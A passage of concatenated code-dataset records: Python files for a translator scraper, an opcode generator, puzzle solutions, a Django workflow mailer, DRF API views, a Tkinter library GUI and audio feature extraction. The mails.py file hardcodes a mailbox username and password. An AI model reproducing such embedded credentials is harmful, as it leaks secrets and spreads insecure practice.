headers={'User-Agent': 'Mozilla/5.0'})\n\n soup = BeautifulSoup(r.content, \"html.parser\")\n\n div = soup.find_all('div', {'id': \"translations-content\"})\n foreign_words = [word.strip() for word in div[0].text.split()]\n\n class_src = f\"src {supporting_languages_tags.get(from_lang, 'ltr')}\"\n class_trg = f\"trg {supporting_languages_tags.get(to_lang, 'ltr')}\"\n\n div_src = soup.find_all('div', {'class': class_src})\n div_trg = soup.find_all('div', {'class': class_trg})\n quotes = list(zip([tag.text.strip() for tag in div_src], [tag.text.strip() for tag in div_trg]))\n return f\"{supporting_languages[to_lang]} Translations:\" \\\n + \"\\n\" + str(foreign_words[0]) + \"\\n\\n\" \\\n + f\"{supporting_languages[to_lang]} Examples:\"\\\n + \"\\n\" + quotes[0][0] + \":\\n\" + quotes[0][1] + \"\\n\\n\"\n\n\nwith open(f\"{word_to_translate}.txt\", \"a+\", encoding=\"utf-8\") as file:\n if to_language == \"0\":\n for language in supporting_languages:\n if language != from_language:\n translate(from_language, language, word_to_translate)\n else:\n translate(from_language, to_language, word_to_translate)\n","sub_path":"Hard-Level/Multilingual Online Translator/Stage 6 Faster translation/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"404635024","text":"\ndef read_opcodes(path_rsc):\n \"\"\" Read opcode from resource file \"\"\"\n with open(path_rsc + \"opcodes.txt\", \"r\") as file:\n text = file.read()\n text = text.replace(\".u8\", \"DUMMY\")\n text = text.replace(\"u8\", \"UINT8\")\n text = text.replace(\"i8\", \"INT8\")\n text = text.replace(\"u16\", \"UINT16\")\n text = text.replace(\"i16\", \"INT16\")\n text = text.replace(\"u32\", \"UINT32\")\n text = text.replace(\"i32\", \"INT32\")\n text = text.replace(\"var\", \"VAR\")\n lines = list(filter(None, text.split(\"\\n\")))\n \n opcodes = [None]*256\n for line in lines:\n l = line.split()\n n = int(l[0][2:], 16)\n if l[1] != \"_uns\":\n opcodes[n] = (l[1], l[2:])\n else:\n opcodes[n] = (\"invalid\", [])\n \n return opcodes\n\n\ndef generate_warning():\n \"\"\" Create warning fot auto-generated files \"\"\"\n return \"/* Auto-generated file, DO NOT MODIFY */\\n\\n\"\n\n\ndef generate_enum(opcodes):\n \"\"\" Create enum from opcodes \"\"\"\n enum = [opcode[0] for opcode in opcodes if opcode[0]!=\"invalid\"]\n enum.append(\"invalid\")\n \n s = \" \"\n for k, e in enumerate(enum):\n s += 
e.upper() + \", \"\n if k%8 == 7:\n s += \"\\n \"\n s += \"\\n\"\n \n return s\n\n\ndef generate_enum_strings(opcodes):\n \"\"\" Create enum strings from opcodes \"\"\"\n enum = [opcode[0] for opcode in opcodes if opcode[0]!=\"invalid\"]\n enum.append(\"invalid\")\n \n s = \" \"\n for k, e in enumerate(enum):\n s += \"\\\"\" + e + \"\\\", \"\n if k%8 == 7:\n s += \"\\n \"\n s += \"\\n\"\n \n return s\n\n\ndef generate_table(opcodes):\n \"\"\" Create table from opcodes \"\"\"\n s = \"\"\n for opcode in opcodes:\n s += \" {{{}, {{{}}}}},\\n\".format(opcode[0].upper(), \",\".join([\"Operand::\" + op for op in opcode[1]]))\n return s\n \n\ndef write_mnemonic_enum(path_src, opcodes):\n \"\"\" Write mnemonic.cpp and mnemonic.hpp \"\"\"\n s = generate_warning()\n s += \"#pragma once\\n\\n\"\n s += \"#include \\n\\n\\n\"\n s += \"enum Mnemonic\\n\"\n s += \"{\\n\"\n s += generate_enum(opcodes) + \"\\n\"\n s += \"};\\n\\n\"\n s += \"std::string mnemonicStr(Mnemonic mnemonic);\\n\"\n \n with open(path_src + \"mnemonic.hpp\", 'w') as file:\n file.write(s)\n \n\n s = generate_warning()\n s += \"#include \\\"mnemonic.hpp\\\"\\n\\n\\n\"\n s += \"std::string mnemonicStr(Mnemonic mnemonic)\\n\"\n s += \"{\\n\"\n s += \" static std::string names[] = {\\n\"\n s += generate_enum_strings(opcodes);\n s += \" };\\n\\n\"\n s += \" return names[(int)mnemonic];\\n\" \n s += \"}\\n\"\n \n with open(path_src + \"mnemonic.cpp\", 'w') as file:\n file.write(s)\n \n\ndef write_opcode_table(path_src, opcodes):\n \"\"\" Write opcode.hpp \"\"\"\n s = generate_warning()\n s += \"#include \\\"opcode.hpp\\\"\\n\\n\\n\"\n s += \"Opcode Opcode::table[256] = {\\n\"\n s += generate_table(opcodes) + \"\\n\"\n s += \"};\\n\\n\"\n s += \"std::string mnemonicStr(Mnemonic mnemonic);\\n\"\n \n with open(path_src + \"opcode.cpp\", 'w') as file:\n file.write(s)\n \n \n \nif __name__=='__main__':\n \"\"\" Main \"\"\"\n path_rsc = \"./\"\n path_src = \"../src/decoder/\"\n \n opcodes = read_opcodes(path_rsc)\n \n write_mnemonic_enum(path_src, opcodes)\n write_opcode_table(path_src, opcodes)","sub_path":"rsc/generate-opcodes.py","file_name":"generate-opcodes.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"540163156","text":"# collected\n# @lc app=leetcode id=2 lang=python\n#\n# [2] Add Two Numbers\n#\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def addTwoNumbers(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n # list is reversed\n\n dummy = ptr = ListNode(-1)\n carry = 0\n while carry or l1 or l2:\n l1_val, l2_val = 0, 0\n\n if l1: \n l1_val = l1.val\n l1 = l1.next\n if l2: \n l2_val = l2.val\n l2 = l2.next\n \n new_val, carry = self.add(l1_val, l2_val, carry)\n new_node = ListNode(new_val)\n ptr.next = new_node\n ptr = ptr.next \n \n return dummy.next\n\n def add(self, num1, num2, carry):\n res = num1 + num2 + carry\n return (res % 10, 1) if res > 9 else (res, 0)\n\n\n","sub_path":"2.add-two-numbers.py","file_name":"2.add-two-numbers.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"86230718","text":"#!/bin/env python3\n\nimport functools as ft\n\n\"\"\" \n https://projecteuler.net/problem=8\n \n TBD: \n list_ints() to be parameter in miltiplied13; \n multiplied13 to be parameter in 
find_max\n\"\"\"\n\n\n# create list of ints\ndef list_ints():\n \"\"\"\n Convert text file to array of ints\n \"\"\"\n list1000 = []\n with open('./textfiles/digits1000_8.txt') as f:\n list1000 = f.read().replace('\\n', '')\n return [int(x) for x in list1000]\n\n\ndef multiplied13():\n \"\"\"\n Multiply every 13 consecutive values of the array\n \"\"\"\n list1000 = list_ints()\n multiplied_list = []\n # stop 12 short of the end so every slice holds exactly 13 ints\n for i in range(len(list1000) - 12):\n # multiply every window of 13 consecutive ints\n multiplied_list.append(ft.reduce(lambda x, y: x * y, list1000[i:i+13]))\n return multiplied_list\n\ndef find_max():\n \"\"\"\n find the max value\n \"\"\"\n the_sum = multiplied13()\n return max(the_sum)\n\n\n\nif __name__ == '__main__':\n print(find_max())\n","sub_path":"project_euler/008.py","file_name":"008.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"319414281","text":"# -*- encoding: utf-8 -*-\n\n\"\"\" Send mails to the owner of the matching workflow step.\n If possible, this could be integrated into the cmdb workflow itself.\n\"\"\"\n\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\nimport imapy\nfrom imapy.query_builder import Q\n\nimport re\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"cmdb.settings\")\n\nimport django\ndjango.setup()\n\nfrom myworkflows.models import WorkflowStateEvent\nfrom myworkflows.utils import do_transition, get_state_user, make_email_notify\n\n\nfrom django.contrib.auth.models import User\n\nfrom cmdb.logs import MailLog\n\nml = MailLog()\n\nfrom django.db import connections\n\n\ndef close_old_connections():\n for conn in connections.all():\n conn.close_if_unusable_or_obsolete()\n\n\nclass SendEmail(object):\n\n def __init__(self, to_list, subject, content):\n self._host = 'smtp.exmail.qq.com'\n self._port = 465\n self._user = 'devopsteam@forcegames.cn'\n self._passwd = 'Khgey@520199'\n self.to_list = to_list\n self.subject = subject\n self.content = content\n\n def send(self):\n 'Send the mail'\n server = None\n try:\n print(self.to_list)\n server = smtplib.SMTP_SSL(self._host, self._port)\n server.login(self._user, self._passwd)\n server.sendmail(\"<%s>\" % self._user, self.to_list, self.get_attach())\n print('send mail to %s ok' % (','.join(self.to_list)))\n ml.logger.info('%s: send mail to %s ok' % (self.subject, ','.join(self.to_list)))\n except Exception as e:\n print(e)\n ml.logger.error('%s: send mail failed' % (self.subject))\n finally:\n # the connection may never have been opened if SMTP_SSL raised\n if server:\n server.close()\n\n def get_attach(self):\n 'Build the mail content'\n attach = MIMEMultipart()\n txt = MIMEText(self.content, 'html', 'utf-8')\n attach.attach(txt)\n\n # subject, the topmost line\n attach[\"Subject\"] = self.subject\n\n # shown as the sender\n attach[\"From\"] = \"DevOps Team<%s>\" % self._user\n\n # recipient list\n attach[\"To\"] = \";\".join(self.to_list)\n\n return attach.as_string()\n\n\nclass RecieveMail(object):\n \"\"\"Fetch mails and run the approval matched by their subject\n \"\"\"\n\n def __init__(self):\n\n self._host = 'imap.exmail.qq.com'\n self._port = 993\n self._username = 'devopsteam@forcegames.cn'\n self._password = 'Khgey@520199'\n\n def recieve_unseen(self, count=5):\n 'Fetch unseen mails, only 5 at a time by default'\n\n box = imapy.connect(\n host=self._host,\n port=self._port,\n username=self._username,\n password=self._password,\n ssl=True,\n )\n\n q = Q()\n\n emails = box.folder('INBOX').emails(\n q.unseen()\n )[0:count]\n\n emails = list(reversed(emails))\n\n p = re.compile(r'.*#工单流程') # matches the ticket-workflow subject tag\n\n for mail in emails:\n try:\n # drop stale database connections before handling the mail\n close_old_connections()\n\n subject = mail['subject']\n from_email = mail['from_email']\n user = User.objects.get(email=from_email)\n 
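# NOTE: assumes each sender address maps to exactly one Django user; a lookup miss raises User.DoesNotExist, which the broad except below logs before the mail is marked as read in finally\n 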
username = user.username\n # mails whose subject carries the ticket-workflow tag need handling\n # anything else is simply marked as read in the finally block\n if p.match(subject):\n user = User.objects.get(username=username)\n wse = subject.split(\"#\")[3].split('=')[1] # 'Re:#工单流程#剑雨后端SVN申请#wse=92' ==> 92\n wse = WorkflowStateEvent.objects.get(id=int(wse))\n reply = mail['text'][0]['text']\n if reply.startswith('yes'):\n transition = wse.state.transition.get(condition='同意')\n ml.logger.info('%s: %s: approving' % (subject, username))\n\n msg, success, new_wse = do_transition(wse, transition, user)\n\n to_list = [\n x.email for x in get_state_user(transition.destination, obj=new_wse.content_object) if x.email\n ]\n\n if to_list:\n subject, content = make_email_notify(True)\n send_mail.delay(to_list, subject, content)\n ml.logger.info('%s: %s: result: %s %s' % (subject, username, msg, success))\n elif reply.startswith('no'):\n transition = wse.state.transition.get(condition='拒绝')\n ml.logger.info('%s: %s: rejecting' % (subject, username))\n msg, success, new_wse = do_transition(wse, transition, user)\n\n to_list = [new_wse.creator.email]\n subject, content = make_email_notify(False)\n send_mail.delay(to_list, subject, content)\n\n ml.logger.info('%s: %s: result: %s %s' % (subject, username, msg, success))\n else:\n ml.logger.warn('%s: %s: no yes/no command matched' % (subject, username))\n else:\n ml.logger.warn('%s: %s: subject did not match' % (subject, username))\n except Exception as e:\n ml.logger.error('%s: %s: %s' % (from_email, subject, str(e)))\n finally:\n # mark every fetched mail as read\n mail.mark('Seen')\n box.logout()\n\n\n\n\n","sub_path":"myworkflows/mails.py","file_name":"mails.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"433077315","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/7/8 00:21\n# @Author : 赵在化\n# @email : zaihuazhao@163.com\n# @File : api.py\nfrom rest_framework import generics\nfrom rest_framework.permissions import IsAuthenticated\nfrom apps.problems.models import ProbelmTemp, ChapterTemp\nfrom apps.problems.serializers import ProblemTempDetailListSerailizer, ChapterTempListSerializer, \\\n ProblemExamListSerializer\nfrom extensions.pagination import StandardResultsSetPagination\n\n\nclass ProblemTempListApi(generics.ListAPIView):\n \"\"\"Problem list\"\"\"\n permission_classes = (IsAuthenticated,)\n serializer_class = ProblemTempDetailListSerailizer\n pagination_class = StandardResultsSetPagination\n\n def get_queryset(self):\n # course = self.request.user.choices\n course = self.request.user.course.num\n \n level = int(self.request.query_params.get('level', 0))\n chapter = int(self.request.query_params.get('chapter', 0))\n category = self.request.query_params.get('category')\n # filer_params = {'course': course, 'chapter': chapter, 'level': level}\n filer_params = {'course': course, 'chapter': chapter}\n\n if category:\n filer_params['category'] = int(category)\n\n return ProbelmTemp.objects.filter(**filer_params).order_by('id')\n\n\nclass ChapterTempListApi(generics.ListAPIView):\n \"\"\"Chapter list\"\"\"\n\n permission_classes = (IsAuthenticated,)\n serializer_class = ChapterTempListSerializer\n\n def get_queryset(self):\n # course = self.request.user.choices\n course = self.request.user.course.num\n # level = int(self.request.query_params.get('level', 0))\n # return ChapterTemp.objects.filter(course=course, level=level).order_by('id')\n return ChapterTemp.objects.filter(course=course).order_by('id')\n\n\n\nclass ProblemDetailApi(generics.RetrieveAPIView):\n \"\"\"Retrieve a single problem\"\"\"\n\r\n 
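# DRF's RetrieveAPIView resolves the object by its pk URL kwarg by default\n 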
permission_classes = (IsAuthenticated,)\n serializer_class = ProblemExamListSerializer\n\n def get_queryset(self):\n return ProbelmTemp.objects.all()\n","sub_path":"apps/problems/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"70036760","text":"from tkinter import*\r\nimport tkinter.messagebox\r\n#import LibBksDatabase\r\n\r\n\r\nclass Library:\r\n def __init__(self,root):\r\n \r\n self.root = root\r\n self.root.title(\"Library Database Management System\")\r\n self.root.geometry(\"1350x750+0+0\")\r\n\r\n\r\n MTy = StringVar()\r\n Ref = StringVar()\r\n Tit = StringVar()\r\n fna = StringVar()\r\n sna = StringVar()\r\n Adr1 = StringVar()\r\n Adr2 = StringVar()\r\n pcd = StringVar()\r\n MNo = StringVar()\r\n BkID = StringVar()\r\n Bkt = StringVar()\r\n BkT = StringVar()\r\n Atr = StringVar()\r\n DBo = StringVar()\r\n Ddu = StringVar()\r\n sPr = StringVar()\r\n LrF = StringVar()\r\n DoD = StringVar()\r\n DonL = StringVar()\r\n\r\n \r\n #=======================================FN declareation=====================================\r\n def iExit():\r\n iExit = tkinter.messagebox.askyesno(\"Library Database Management System\",\r\n \"Confirm if you want to Exit\")\r\n if iExit > 0:\r\n root.destroy()\r\n return\r\n\r\n def ClaearData():\r\n self.txtMType.delete(0,END)\r\n self.txtBkID.delete(0,END)\r\n self.txtRef.delete(0,END)\r\n self.txtTit.delete(0,END)\r\n self.txtfna.delete(0,END)\r\n self.txtsna.delete(0,END)\r\n self.txtAdr1.delete(0,END)\r\n self.txtAdr2.delete(0,END)\r\n self.txtpcd.delete(0,END)\r\n self.txtMNo.delete(0,END)\r\n self.txtBkID.delete(0,END)\r\n self.txtBkt.delete(0,END)\r\n self.txtAtr.delete(0,END)\r\n self.txtDBo.delete(0,END)\r\n self.txtDdu.delete(0,END)\r\n self.txtsPr.delete(0,END)\r\n self.txtLrF.delete(0,END)\r\n self.txtDoD.delete(0,END)\r\n self.txtDonL.delete(0,END)\r\n\r\n def addData():\r\n if(len(MTy.get())!=0):\r\n LibBksDatabase.addDataRec(MTy.get(), Ref.get(), Tit.get(), fna.get(),sna.get(),Adr1.get(),Adr2.get(),pcd.get(),MNo.get(),BkID.get(),\r\n Bkt.get(),MType.get(),BkT.get(), Atr.get(),DBo.get(),Ddu.get(),sPr.get(),LrF.get(),DoD.get(),DonL.get())\r\n booklist.delete(0,END)\r\n booklist.insert(END,(MTy.get(), Ref.get(), Tit.get(), fna.get(),sna.get(),Adr1.get(),Adr2.get(),pcd.get(),MNo.get(),BkID.get(),\r\n Bkt.get(),MType.get(),BkT.get(), Atr.get(),DBo.get(),Ddu.get(),sPr.get(),LrF.get(),DoD.get(),DonL.get()))\r\n \r\n \r\n\r\n\r\n \r\n #=======================================FRAMES=====================================\r\n MainFrame = Frame(self.root)\r\n MainFrame.grid()\r\n\r\n TitFrame = Frame(MainFrame, bd=2, padx = 40, pady=8, bg=\"Cadet blue\", relief = RIDGE)\r\n TitFrame.pack(side = TOP)\r\n\r\n self.lblTit = Label(TitFrame, font=('arial',46,'bold'),text=\"Library Database Management System\")\r\n self.lblTit.grid(sticky=W)\r\n\r\n ButtonFrame = Frame(MainFrame, bd = 2, width=1350, height = 100, padx=20, bg = \"Cadet Blue\",relief=RIDGE)\r\n ButtonFrame.pack(side=BOTTOM)\r\n\r\n FrameDetail = Frame(MainFrame, bd=0, width=1350, height = 50, padx=20, relief=RIDGE)\r\n FrameDetail.pack(side=BOTTOM)\r\n\r\n DataFrame = Frame(MainFrame, bd=1, width = 1300, height = 400, padx=20, pady=20, relief=RIDGE)\r\n DataFrame.pack(side=BOTTOM)\r\n\r\n DataFrameLEFT = LabelFrame(DataFrame, bd=1, width = 800 , height = 300, padx=20, relief=RIDGE, font=('arial',12,'bold'), text=\"Library Management Info:\",bg=\"Cadet Blue\")\r\n 
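# the left pane carries the labelled entry grid; the right pane built below holds the Listbox of saved records\r\n 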
DataFrameLEFT.pack(side=LEFT)\r\n\r\n DataFrameRIGHT = LabelFrame(DataFrame, bd=1, width = 450, height = 300, padx=20, pady=3, relief=RIDGE,font=('arial',12,'bold'),bg=\"Cadet Blue\",text=\"Book Details:\")\r\n DataFrameRIGHT.pack(side=RIGHT)\r\n\r\n \r\n #=======================================LABLES and Entry=====================================\r\n self.lblMemberType = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Member Type\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblMemberType.grid(row=0, column=0,sticky=W)\r\n self.txtMType = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable=MTy,width=25)\r\n self.txtMType.grid(row=0, column=1)\r\n\r\n self.lblBkID = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"BOOK ID\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblBkID.grid(row=0, column=2,sticky=W)\r\n self.txtBkID = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable=BkID,width=25)\r\n self.txtBkID.grid(row=0, column=3)\r\n\r\n self.lblRef = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Refrence No:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblRef.grid(row=1, column=0,sticky=W)\r\n self.txtRef = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable=Ref,width=25)\r\n self.txtRef.grid(row=1, column=1)\r\n\r\n self.lblBkt = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Book Title:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblBkt.grid(row=1, column=2,sticky=W)\r\n self.txtBkt = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = Bkt,width=25)\r\n self.txtBkt.grid(row=1, column=3)\r\n\r\n self.lblTit = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Title:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblTit.grid(row=2, column=0,sticky=W)\r\n self.txtTit = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = Tit,width=25)\r\n self.txtTit.grid(row=2, column=1)\r\n\r\n self.lblAtr = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Author\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblAtr.grid(row=2, column=2,sticky=W)\r\n self.txtAtr = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = Atr,width=25)\r\n self.txtAtr.grid(row=2, column=3)\r\n\r\n self.lblfna = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"FirstName:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblfna.grid(row=3, column=0,sticky=W)\r\n self.txtfna = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = fna,width=25)\r\n self.txtfna.grid(row=3, column=1)\r\n\r\n \r\n self.lblDBo = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Date of Borrowed:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblDBo.grid(row=3, column=2,sticky=W)\r\n self.txtDBo = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = DBo,width=25)\r\n self.txtDBo.grid(row=3, column=3)\r\n\r\n self.lblsna = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Surname:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblsna.grid(row=4, column=0,sticky=W)\r\n self.txtsna = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = sna,width=25)\r\n self.txtsna.grid(row=4, column=1)\r\n\r\n self.lblDdu = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Due Date\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblDdu.grid(row=4, column=2,sticky=W)\r\n self.txtDdu = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = Ddu,width=25)\r\n self.txtDdu.grid(row=4, column=3)\r\n\r\n self.lblAdr1 = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Address1 :\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblAdr1.grid(row=5, column=0,sticky=W)\r\n 
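# each form row pairs a Label with an Entry bound to the matching StringVar declared above\r\n 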
self.txtAdr1 = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = Adr1,width=25)\r\n self.txtAdr1.grid(row=5, column=1)\r\n\r\n self.lblDonL = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Days on Loan\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblDonL.grid(row=5, column=2,sticky=W)\r\n self.txtDonL = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = DonL,width=25)\r\n self.txtDonL.grid(row=5, column=3)\r\n\r\n self.lblAdr2 = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Address2 :\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblAdr2.grid(row=6, column=0,sticky=W)\r\n self.txtAdr2 = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = Adr2,width=25)\r\n self.txtAdr2.grid(row=6, column=1)\r\n\r\n self.lblLrF = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Late Return Fees\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblLrF.grid(row=6, column=2,sticky=W)\r\n self.txtLrF = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = LrF,width=25)\r\n self.txtLrF.grid(row=6, column=3)\r\n\r\n self.lblpcd = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Post Code:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblpcd.grid(row=7, column=0,sticky=W)\r\n self.txtpcd = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = pcd,width=25)\r\n self.txtpcd.grid(row=7, column=1)\r\n\r\n self.lblDoD = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Date over Due:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblDoD.grid(row=7, column=2,sticky=W)\r\n self.txtDoD = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = DoD,width=25)\r\n self.txtDoD.grid(row=7, column=3)\r\n\r\n self.lblMNo = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Mobile Number:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblMNo.grid(row=8, column=0,sticky=W)\r\n self.txtMNo = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = MNo,width=25)\r\n self.txtMNo.grid(row=8, column=1)\r\n\r\n self.lblsPr = Label(DataFrameLEFT, font=('arial',12,'bold'),text=\"Selling Price:\", padx=2, pady=2,bg=\"Cadet Blue\")\r\n self.lblsPr.grid(row=8, column=2,sticky=W)\r\n self.txtsPr = Entry(DataFrameLEFT, font=('arial',12,'bold'),textvariable = sPr,width=25)\r\n self.txtsPr.grid(row=8, column=3)\r\n #=======================================ListBoc and Scrollbar=====================================\r\n\r\n\r\n scrollbar = Scrollbar(DataFrameRIGHT)\r\n scrollbar.grid(row=0,column = 1,sticky='ns')\r\n\r\n booklist = Listbox(DataFrameRIGHT,width=45, height = 12, font=('arial',12,'bold'),yscrollcommand = scrollbar.set)\r\n booklist.grid(row=0,column = 0, padx=8)\r\n scrollbar.config(command = booklist.yview)\r\n\r\n #=======================================Buttons=====================================\r\n self.btnAddData = Button(ButtonFrame , text = \"ADD Data\", font=('arial',14,'bold'),height= 2, width = 13,bd=4,command = addData)\r\n self.btnAddData.grid(row=0,column=0)\r\n\r\n self.btnDisplayData = Button(ButtonFrame , text = \"Display Data\", font=('arial',14,'bold'),height= 2, width = 14,bd=4)\r\n self.btnDisplayData.grid(row=0,column=1)\r\n\r\n self.btnClearData = Button(ButtonFrame , text = \"Clear Data\", font=('arial',14,'bold'),height= 2, width = 13,bd=4, command = ClaearData)\r\n self.btnClearData.grid(row=0,column=2)\r\n\r\n self.btnDeleteData = Button(ButtonFrame , text = \"Delete Data\", font=('arial',14,'bold'),height= 2, width = 14,bd=4)\r\n self.btnDeleteData.grid(row=0,column=3)\r\n\r\n self.btnUpdateData = Button(ButtonFrame , text = \"Update 
Data\", font=('arial',14,'bold'),height= 2, width = 14,bd=4)\r\n self.btnUpdateData.grid(row=0,column=4)\r\n\r\n self.btnSearchData = Button(ButtonFrame , text = \"Search Data\", font=('arial',14,'bold'),height= 2, width = 14,bd=4)\r\n self.btnSearchData.grid(row=0,column=5)\r\n\r\n self.btnExit = Button(ButtonFrame , text = \"Exit\", font=('arial',14,'bold'),height= 2, width = 13,bd=4, command = iExit)\r\n self.btnExit.grid(row=0,column=6)\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n root = Tk()\r\n application = Library(root)\r\n root.mainloop()\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n","sub_path":"Library Management System.py","file_name":"Library Management System.py","file_ext":"py","file_size_in_byte":10993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"160780388","text":"import numpy as np\nimport librosa\nimport os\nimport soundfile as sf\nimport matplotlib.pyplot as plt\n\n\"\"\"\n This file takes care of the computation of the inputs and to the saving of the results in training/testing task\n\"\"\"\n\ndef getStats(feature):\n \"\"\"\n\n :param feature: np array in 3 dimensions\n :return: the mean and the std of this array through the axis 1 and 2\n \"\"\"\n return np.array([np.mean(feature, axis=(1, 2)), np.std(feature, axis=(1, 2))])\n\ndef getAllInputs(filename):\n \"\"\"\n\n :param filename: a .wav file\n :return: the inputs (not normalized) for the neural network\n \"\"\"\n audio, sr_ = sf.read(filename) # (4800000, 2)\n left = audio[::2, 0]\n right = audio[::2, 1]\n\n # waveform - (2, 120000)\n waveform = audio.T[:, ::4]\n\n # spectrogram - (2, 1025, 469)\n spectrogram = np.abs(np.array([librosa.core.stft(left),\n librosa.core.stft(right)]))\n # rms - (2, 1, 469)\n rms = np.array([librosa.feature.rms(left), # Root Mean Square\n librosa.feature.rms(right)])\n # zcr - (2, 1, 469)\n zcr = np.array([librosa.feature.zero_crossing_rate(left), # Zero Crossing Rate\n librosa.feature.zero_crossing_rate(right)])\n # sc - (2, 1, 469)\n sc = np.array([librosa.feature.spectral_centroid(left), # Spectral Centroid\n librosa.feature.spectral_centroid(right)])\n # sr - (2, 1, 469)\n sr = np.array([librosa.feature.spectral_rolloff(left), # Spectral Roll-of\n librosa.feature.spectral_rolloff(right)])\n # sfm - (2, 1, 469)\n sfm = np.array([librosa.feature.spectral_flatness(left), # Spectral Flatness Mesure\n librosa.feature.spectral_flatness(right)])\n # mel_spectrogram - (2, 100, 469)\n n_mels = 100\n mel_spectrogram = np.array([librosa.feature.melspectrogram(y=left, sr=sr_, n_mels=n_mels), # (2, 100, 469)\n librosa.feature.melspectrogram(y=right, sr=sr_, n_mels=n_mels)])\n logmel_spectrogram = librosa.core.amplitude_to_db(mel_spectrogram)\n\n # getStats - (10,)\n stats = np.concatenate([getStats(rms), getStats(zcr),\n getStats(sc), getStats(sr), getStats(sfm)])\n #### Reshape for the neural network #####\n # Waveform\n waveform = np.reshape(waveform, (2, 120000))\n\n\n # spectrogram\n spectrogram = np.reshape(spectrogram, (2, 1025, 469)) # Not used\n\n # Features\n features = np.concatenate(\n [\n np.reshape(rms, (2, 469)),\n np.reshape(zcr, (2, 469)),\n np.reshape(sc, (2, 469)),\n np.reshape(sr, (2, 469)),\n np.reshape(sfm, (2, 469))\n ],\n axis=0\n )\n features = np.reshape(features, (10, 469))\n\n # Features mstd\n fmstd = np.reshape(stats.T, (2, 10)) # (right+left, 2 * nb_features)\n\n ##### Create datas #####\n data = (\n waveform, # (2, 120000)\n logmel_spectrogram, # (2, 1025, 469), for mel : (2, 100, 469)\n features, # (10, 
